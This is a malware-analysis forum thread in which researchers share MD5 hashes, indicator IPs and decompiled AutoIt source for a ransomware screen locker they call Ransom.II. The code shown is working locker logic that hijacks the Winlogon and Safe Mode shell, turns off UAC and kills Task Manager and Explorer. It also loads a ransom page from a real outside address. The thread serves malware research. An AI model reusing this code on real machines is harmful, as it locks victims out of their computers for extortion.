A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #16586  by thisisu
 Tue Nov 13, 2012 1:02 am
Win32:Virut wrote:Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II
Parts of decompiled Autoit script. / Highlights?
Code: Select all
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp

$UNDERGROUND = "brasilia"
$SWISS = "germany"

ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
	If @OSArch = "X64" Then
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	Else
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
	If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
	RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
	RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
	FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
	$DIFF = TimerDiff($TIMER)
	If $DIFF > 150 Then
		If ProcessExists("taskmgr.exe") Then
			ProcessClose("taskmgr.exe")
		EndIf
		If ProcessExists("explorer.exe") Then
			Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
		EndIf
		$DIFF = 0
		$TIMER = TimerInit()
	EndIf
	WinSetOnTop($HGUI, "", 1)
	WinActivate($HGUI)
WEnd
Full decompile in attachment.

You can add this IP: 95.163.104.88 to your page Kafeine :)
Attachments
pass: infected
(206.94 KiB) Downloaded 108 times
 #16587  by thisisu
 Tue Nov 13, 2012 1:35 am
Win32:Virut wrote:Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/
Lots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.
Code: Select all
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp

If FileExists(@AppDataDir & "1.exe") Then
	$HAFTBEFEHLAAT = "haftbefehlaat"
	$URL = "95.163.104.87/aff14/start.php"
Full decompile in attach
Attachments
pass: infected
(209.58 KiB) Downloaded 104 times